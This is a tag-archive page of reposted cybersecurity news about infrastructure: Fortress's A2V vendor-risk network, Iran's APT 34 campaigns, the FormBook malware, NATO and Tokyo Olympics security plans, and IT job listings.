now browsing by tag


#cybersecurity | hacker | Cloud Infrastructure IAM Lessons from the Capital One Breach

Source: National Cyber Security – Produced By Gregory Evans Cloud infrastructure is the foundation of more companies than ever. As with any foundation, any crack can lead to significant damage to the infrastructure. One potential crack is a trusted identity with unnecessary and excessive privileges. A “trusted identity” is invariably associated with people — employees, […] View full post on

#cybersecurity | #hackerspace | Fortress Information Security Strives to Help Protect Critical Infrastructure

Source: National Cyber Security – Produced By Gregory Evans

The agencies and businesses that make up the backbone of our critical infrastructure have a larger bullseye on their backs than an average company. When it comes to the electric utility providers that manage the power grid, the exposure to risk is exacerbated by the fact that much of the equipment, software, and services come from a limited set of vendors. Fortress Information Security just launched the Asset to Vendor (A2V) Network to mitigate these risks and improve the security posture of the power grid.

The Federal Energy Regulatory Commission (FERC) recognizes the unique threats posed to the power grid and understands that it’s crucial to address these challenges and protect the critical infrastructure. FERC has issued requirements for standardized risk assessments and mandated that electric utility providers prioritize supply chain vendors based on their relative risk. The problem is that many of the 3,000 or so electric providers are small, regional companies that don’t have the budget or resources to do this effectively on their own.

The A2V Network was launched as a joint venture between Fortress and AEP (American Electric Power) to address this challenge and help all electric utility companies collaborate to comply with the FERC regulations and improve protection of the critical infrastructure more efficiently and effectively. Organizations that join the A2V Network will be able to purchase completed vendor assessments for significantly less than it would cost them to conduct a redundant assessment of their own, and participating companies can also contribute completed assessments to build out the A2V Network library.

Reluctance to Share

I had an opportunity to chat with Alex Santos, CEO of Fortress, about the A2V Network and some of the challenges it addresses. He described the supply chain like streets in a community. Just as each person is responsible of their own home and property, but share the roads and pay taxes to share the burden and ensure the roads are taken care of, each company is responsible for itself, but they share risk exposure from the supply chain and it makes sense to collaborate and share the burden to mitigate the risk and secure the critical infrastructure.

I asked Santos for his thoughts on why businesses in general—not just electric power providers—seem so reluctant to engage in this sort of sharing and collaborative effort. The two main issues, according to Santos are that some information is very proprietary, and some information is not very good. Companies want to maintain the privacy of intellectual property and sensitive information. In some cases, there is a competitive advantage associated and sharing it is just bad for business. In other instances, organizations are reluctant to engage in sharing information because what they receive is not useful. If the information is not properly vetted and curated to ensure it is correct and relevant, it creates more problems than it solves.

Santos explained that the A2V Network strives to address both of those challenges. The A2V Network takes information about supply chain risk assessments and provides a platform to easily share it while anonymizing it and protecting the privacy of proprietary data. Part of what the A2V Network also does is to validate the information and make it actionable.

Gaining Momentum

Santos was especially grateful for having AEP as a partner for the launch of the A2V Network. He noted that even though there are 3,000 electric utility providers, only about 150 of those are large enough to be regulated by the North American Electric Reliability Corporation (NERC)—and that the top 15 largest deliver power for 75% of consumers. That leaves nearly 2,900 companies that must comply with the FERC regulation but lack the resources to do it effectively on their own.

He said that having AEP on board is huge because any new movement or initiative requires a first big company to get the ball rolling. AEP showed leadership in taking that initiative and having a company with the size and prestige of AEP involved creates a snowball effect that will entice other electric utility providers to jump on board.

The more companies get involved, the more momentum the A2V Network will have and the greater value it will provide to every participating organization. That, in turn, will attract more companies. It becomes a self-feeding cycle of momentum that will ultimately lead to a more secure critical infrastructure.

Source link

The post #cybersecurity | #hackerspace |<p> Fortress Information Security Strives to Help Protect Critical Infrastructure <p> appeared first on National Cyber Security.

View full post on National Cyber Security

#cybersecurity | #hackerspace | Derbycon2019, Matthew Szymanski’ ‘REST In Peace: Abusing GraphQL To Attack Underlying Infrastructure’

Source: National Cyber Security – Produced By Gregory Evans

Many Thanks to Adrian Crenshaw (Irongeek), and his Videographer Colleagues for Sharing His and Their Outstanding Videos Of This Last And Important DerbyCon 2019.
Visit Irongeek for additional production credits and additional information. Subscribe to Irongeek’s content, and provide Patreon support as well.


The post Derbycon2019, Matthew Szymanski’ ‘REST In Peace: Abusing GraphQL To Attack Underlying Infrastructure’ appeared first on Security Boulevard.

Source link

The post #cybersecurity | #hackerspace |<p> Derbycon2019, Matthew Szymanski’ ‘REST In Peace: Abusing GraphQL To Attack Underlying Infrastructure’ <p> appeared first on National Cyber Security.

View full post on National Cyber Security

IT Infrastructure Manager

CSM Companies, Inc – Madison, WI

The Information Technology Infrastructure Manager is responsible for providing reliable, stable and efficient infrastructure to support the company’s business and to support value creation for the enterprise. The IT Infrastructure Manager is a very hands on role working with and leading 1-2 System Administrators in the identification, prioritization, and resolution of critical network, server, storage and system related issues and projects that impact business operations. In addition, the IT Infrastructure Manager will collaborate to identify technologies that can be used to improve the overall health of the company computing environment. The IT Infrastructure Manager will provide level 2 support to the Helpdesk as needed and mentorship to the system administrators to maintain a high level of customer service for internal customer questions, incidents, and service requests

Primary Duties:
Responsible for overall IT infrastructure stability, resiliency and performance including datacenter and network physical and virtual resources.
Responsible for ensuring appropriate IT infrastructure capacity in order to ensure optimum system performance.
Coordinates and works with resources (internal and external) to meet established project milestones and to achieve project deliverables.
Identifies areas for improvement, develops improvement program and monitors the implementation to increase process efficiency.
Recommends suitable technology infrastructure updates in order to develop long-term and short-term planning.
Assists in developing IT budget for IT infrastructure.
Develop plans for implementation of new projects, perform Project Management.
Explores requirements from CIO and IT team in order to recommend the most suitable IT infrastructure solutions.
Participates in evaluations, recommends and plans implementations of new technologies and platforms to determine alignment with businesses needs.
Elaborates functional requirements into technical specifications in order to ensure effective deployments.
Manages resource availability in order to continuously support the business, including backup administration.
Reviews all new and updated processes and procedures introduced into the production environment to insure SLA compliance.
Participates in development, maintenance and testing of disaster recovery plans as required & implements improvements.
Performs research on relevant products and services that positively impact company business drivers.
Provides mentoring and professional development of system admin staff.
Provides detailed reports periodically for management.
Manage response to alerts and notifications of after-hours activity.
Oversight and administration of Generator, power, and HVAC/Environmental controls, where applicable.
Tier-2 support as required.
Travel to branches as required.
Off-hour support as required.
Education and/or experience equivalent to a minimum of an Bachelor’s degree from an accredited college, or university with a degree in computer sciences or a related discipline, plus 5-10 years of experience in server and network administration
Hands-on experience in the following technology concepts
Firewall configuration and troubleshooting
Network, data, and voice routing and configuration (Cisco/Meraki/3CX/ShoreTel)
Working technical knowledge of SAN technology
Server and PC operating systems, (Windows 7 Pro, Windows 10 Pro, Windows Server 2008, Windows Server 2012 and Linux
Virtual Hypervisor Technologies (VMWare/Hyper-V)
Active Directory Services
Internet Protocols (e.g. DNS, HTTP, SMTP, SSL)
Demonstrated management and leadership skills
Able to identify, prioritize, and solve complex server and network-related problems
Able to work in a fast paced complex and dynamic environment with remote resources
Strong analytical and problem solving skills
Excellent verbal and written communication skills with the ability to present information to all levels of the organization
Strong customer service orientation
Willing to work in a team-oriented, collaborative, geographically dispersed environment

Preferred Certifications:
Professional certifications from Microsoft, VMWare, Cisco, ISACA, Agile Scrum, ITIL, or Six Sigma, etc.


The post IT Infrastructure Manager appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

NATO #Vows to #Develop #Cybersecurity #Infrastructure

Source: National Cyber Security News

NATO Secretary General Jens Stoltenberg said Wednesday at a news conference in Brussels that NATO member states expressed their readiness to modernize the Alliance’s command structure.

“We will establish a new joint force command for the Atlantic, to help protect sea lines of communication between North America and Europe,” Stoltenberg told reporters following the first ministerial session of the current North Atlantic Council. “We will establish a new support command for logistics, reinforcement and military mobility — improving the movement of troops and equipment is essential to our collective deterrence and defense.”

However, NATO Secretary General did not specify the particular timeline of the pending modernization.


“We have not made any final decisions on where to locate new land component commands … but we have decided that we need some more new land component commands. I know that several nations have put forward proposals that they are ready to host new land component commands,” Stoltenberg said.
The Secretary General pointed out that the decision on the location of the new commands would be made during the defense ministers’ meeting in June.

“What we decide today is the structure, then we will as we move toward the meeting of defense ministers in June to decide the geographical footprint, where to locate the new commands and also the exact manning level in the new command,” Stoltenberg added.

Read More….

View full post on National Cyber Security Ventures


THE INTERNATIONAL INTELLIGENCE agency always has a keen interest in Iran’s hacking activity. And new research published by the security firm FireEye on Thursday indicates the country’s efforts show no signs of slowing. In fact, a new network reconnaissance group— FireEye calls them Advanced Persistent Threat 34—has spent the last few years burrowing deep into critical infrastructure companies.

Given how aggressively Iran has pursued infrastructure hacking, previously targeting the financial sector and even a dam in upstate New York, the new findings serve as a warning, and highlight the evolving nature of the threat.

FireEye researchers tracked 34 of the group’s attacks on institutions in seven Middle Eastern countries between 2015 and mid-2017, but says APT 34 has been operational since at least 2014. The group appears to target financial, energy, telecommunications, and chemical companies, and FireEye says it has moderate confidence that its hackers are Iranians. They log into VPNs from Iranian IP addresses, adhere to normal Iranian business hours, their work has occasionally leaked Iranian addresses and phone numbers, and their efforts align with Iranian interests. Namely, targeting the country’s adversaries.

New APT in Town

There isn’t definitive evidence of a direct link between APT 34 and APT 33, an Iranian hacking group and malware distributor FireEye published findings on in September. But researchers have seen APT 34 operating concurrently inside many of the same target networks as other Iranian hackers.

“We have seen, and this is with a lot of the Iranian actors, a very disconcerting or aggressive posture towards critical infrastructure organizations,” says John Hultquist, director of intelligence analysis at FireEye. “APT 33 has targeted a lot of organizations in critical infrastructure in the Middle East and so has APT 34. They obviously represent opportunities for intelligence collection. But we always have to think about the alternative use of those intrusions or accesses as possible means for disruption and destruction, especially given the destructive incidents we’ve already seen with other Iranian actors.”

To establish what Hultquist describes as beachheads, APT 34 uses involved operations to move deeper and deeper into a network, or exploit a toehold within one organization to pivot into another. FireEye has observed the group compromising someone’s email account at a target company, rifling through their archive, and restarting threads as old as a year, to trick the recipient into clicking a malicious attachment. The hackers also use compromised email accounts to spearphish other companies, and leapfrog into their systems as well.

While the APT 34 Iranian hacking activity doesn’t appear to target the United States, any Iranian efforts in that space are noteworthy. The countries have a long history of cyber antagonism, which includes the deployment of Stuxnet, malware thought to be a product of the NSA and their Israeli counterparts, to cripple Iran’s uranium enrichment activities. Tensions between the countries have escalated recently as well, with President Donald Trump recently taking steps to decertify the nuclear agreement between the US and Iran.

‘A Multilayered Approach’
APT 34 uses malicious Excel macros and PowerShell-based exploits to move around networks. The group also has fairly extensive social media operations, deploying fake or compromised accounts to scope out high-profile targets, and using social engineering to get closer to particular organizations. FireEye researchers speculate that APT 34 may be a reconnaissance and persistence unit, focused on finding ways into new networks and broadening access within existing targets. Some evidence indicates that the group may work directly for the Iranian government, but it’s also possible that the hackers are effectively contractors, selling backdoors to the government as they find them.

“When you look at this, it’s a multilayered approach,” says Jeff Bardin, the chief intelligence officer of the threat-tracking firm Treadstone 71, which monitors Iranian hacking activity. “They get in and make a lot of modifications, download new malware, manipulate the memory, so it’s definitely pretty sophisticated. And the Powershell activity has been largely a hallmark of Iranian activity lately. They change their tactics constantly. The more we divulge things we know about them, the more they’ll shift and change.”

Though much remains unknown about APT 34, its capabilities and prowess make the group’s interest in critical infrastructure targets all the more noteworthy, whether it’s tasked with carrying out full operations itself, or charged with laying the groundwork for others to do so.

“This is yet another example of Iranian cyber capability, which only seems to grow every day,” FireEye’s Hultquist says. “It’s a challenge for people who are concerned with Iranian actors, and as geopolitics shifts, the number of people who should be concerned with Iranian actors will probably only increase.”

View full post on National Cyber Security Ventures

Information Technology Specialist (Network Infrastructure)

more information on sonyhack from leading cyber security expertsSource: National Cyber Security – Produced By Gregory Evans Court Services and Offender Supervision Agency for DC – Washington, DC $94,796 – $123,234 a year – Full-time, Part-time Duties Summary The position is located in the Office of Information Technology (OIT), Court Services and Offender Supervision Agency (CSOSA) for the District of Columbia. Working in […] View full post on | Can You Be Hacked?

CyberSecurity Alert in South Korea and the United States as Data Stealing Malware Attacks the Infrastructure

Source: National Cyber Security – Produced By Gregory Evans

CyberSecurity Alert in South Korea and the United States as Data Stealing Malware Attacks the Infrastructure

FormBook is the new malware from attackers targeting manufacturing, defense, and aerospace firms in the South Korea and the United States.

According to the expert FireEye researchers, Formbook was identified in numerous distribution campaigns attacking the U.S. with emails containing unauthentic XLS, DOC, or PDF files. Even similar attacks from FormBook have been identified in South Korea through emails containing malicious files in ZIP, ACE, ISOS, and RAR formats.

With functional payloads, Formbook creates grabber to steal the data, the same being advertised in various hacking forums since 2016. Keylogging, tracking HTTP/SPDY/HTTPS/HTTP2 forms, network requests, stealing passwords from the browsers, email clients, clipboard monitoring, and taking screenshots are some of the prominent capabilities of FormBook.

There have been wide assortments of distribution mechanisms leveraged by the attackers of such email campaigns to distribute the information from FormBook malware, as posted on 9th October 2017 on the

As confirmed by the FireEye experts, an important and exclusive feature of this malware is that is can read ‘Windows ntdl.dll module’ to memory from the disk. This is the exported function of the FormBook making ineffective the API monitoring and user-mode hooking mechanisms.

There is a self-extracting RAR file that delivers the payload execution to the FormBook. During the instigation of launch,an AutoIt loadersrun and compile the script. This script decrypts the files from FormBook payload into a memory and then carry the execution process, confirm the researchers.

But overtime the researchers have identified that FormBook can also download NanoCore, which is a remote access Trojan or RAT that was first witnessed in 2013 and readily sold on the web. Taylor Huddleston, the author of the same was arrested for this in March 2017.

Besides the United States and South Korea, the malware has targeted other countries, such as United Kingdom, France, Poland, Ukraine, Hungry, Russia, Australia, Germany, and Netherlands.Even the archive campaign has hit the prominent countries of the world like United States, Belgium, Japan, Saudi Arabia, France, Sweden, Germany, and India.

The FormBook holds the potential to hit Windows devices, and hence it has become an urgent need for the high-end institutions to look to a more secure solution and upgrade their Windows operating system. As for now, it is announced strictly to not open any suspicious emails or click on unidentified links or download any unknown attachments from any unrecognized email address.


The post CyberSecurity Alert in South Korea and the United States as Data Stealing Malware Attacks the Infrastructure appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

IT Infrastructure Manager – Denver International Airport

Source: National Cyber Security – Produced By Gregory Evans

  Denver International Airport is the 19th-busiest airport in the world and the sixth-busiest airport in the United States, serving 58.3 million passengers last year and generating more than $26 billion for the region annually. DEN is the largest and newest commercial airport in the United States and consists of…

The post IT Infrastructure Manager – Denver International Airport appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Tokyo plans cybersecurity hub to protect infrastructure during 2020 Olympics

Source: National Cyber Security – Produced By Gregory Evans

The government said Thursday it will create a new body to oversee the protection of crucial infrastructure from cyberattacks during the Tokyo Olympics and Paralympics in 2020. The cybersecurity response center will compile and share information with government agencies and companies that operate crucial infrastructure such as transportation and power…

The post Tokyo plans cybersecurity hub to protect infrastructure during 2020 Olympics appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures